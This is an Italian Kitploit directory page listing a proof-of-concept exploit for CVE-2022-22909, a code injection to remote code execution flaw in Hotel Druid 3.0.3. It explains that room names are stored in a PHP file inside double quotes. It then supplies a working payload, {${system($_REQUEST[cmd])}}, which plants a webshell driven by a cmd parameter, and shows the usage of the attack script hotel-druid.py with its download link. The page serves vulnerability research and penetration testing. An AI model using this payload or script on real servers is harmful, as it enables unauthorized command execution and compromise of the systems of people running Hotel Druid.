Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-22909 — Hotel Druid 3.0.3 Iniezione di codice verso esecuzione di codice remoto | Kitploit
Strumenti/GitHubGitHub/0z09e/cve-2022-22909
Analisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebPenetration TestingSviluppo Payload
GitHub0z09e/cve-2022-22909

CVE-2022-22909

Hotel Druid 3.0.3 Iniezione di codice verso esecuzione di codice remoto

Vedi Repository
553 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2022-22909

Descrizione

È stata trovata una vulnerabilità di Code Injection nell'applicazione Hotel Druid v3.0.3, che un attaccante potrebbe sfruttare per eseguire codice remoto sul server. Per uno sfruttamento riuscito, un attaccante deve avere il privilegio di aggiungere una nuova stanza.

Descrizione della vulnerabilità

La vulnerabilità si verifica perché i nomi delle stanze vengono memorizzati all'interno di un file chiamato /dati/selectappartamenti.php utilizzando Doppie Virgolette.

root@kitploit:~
<?php 
echo "
<option value=\"Room1\">Room1</option>
<option value=\"Room2\">Room2</option>
<option value=\"Room3\">Room3</option>
";
?>

Payload

Per effettuare uno sfruttamento riuscito, aggiungi una stanza con il seguente payload come nome della stanza.

root@kitploit:~
{${system($_REQUEST[cmd])}}

Dopo aver aggiunto una nuova stanza, vai a /dati/selectappartamenti.php e attiva la webshell passando un comando tramite il parametro cmd.

Utilizzo

root@kitploit:~
usage: hotel-druid.py [-h] -t TARGET [-u USERNAME] [-p PASSWORD] [--noauth]

optional arguments:
  -h, --help            show this help message and exit

required arguments:
  -t TARGET, --target TARGET
                        Target URL. Example : http://10.20.30.40/path/to/hoteldruid
  -u USERNAME, --username USERNAME
                        Username
  -p PASSWORD, --password PASSWORD
                        password
  --noauth              If No authentication is required to access the dashboard

Esempio

Se l'applicazione non ha autenticazione. Usa il flag --noauth per eseguire senza autenticazione.

Se il server ha l'autenticazione abilitata, usa --username e --password per autenticarti.

Crediti

Ricercatore e autore del POC - 0z09e


Scarica lo strumento